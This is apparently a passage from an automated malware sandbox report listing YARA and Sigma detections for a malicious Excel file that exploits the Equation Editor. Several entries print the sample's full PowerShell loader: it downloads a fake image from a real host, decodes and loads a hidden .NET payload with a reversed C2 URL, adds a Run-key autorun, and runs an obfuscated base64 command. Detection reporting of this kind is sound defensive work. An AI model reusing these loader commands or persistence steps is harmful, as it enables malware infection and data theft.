            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
            17.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:
            Click to see the 15 entries

            Sigma Signatures

            Exploits

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.178.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3300, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3300, TargetFilename: C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs

            Spreading

            barindex
            Sigma detected: Powershell download payload from hardcoded c2 list
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3300, Protocol: tcp, SourceIp: 198.46.178.154, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Sigma detected: Script Initiated Connection to Non-Local Network
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3400, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1648, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , ProcessId: 3400, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1648, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , ProcessId: 3400, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\incontrovertido.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path
            Sigma detected: Excel Network Connections
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.241.153.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1648, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3856, TargetFilename: C:\ProgramData\incontrovertido.vbs
            Sigma detected: Script Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3400, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs, ProcessId: 3856, ProcessName: powershell.exe
            Sigma detected: Suspicious Office Outbound Connections
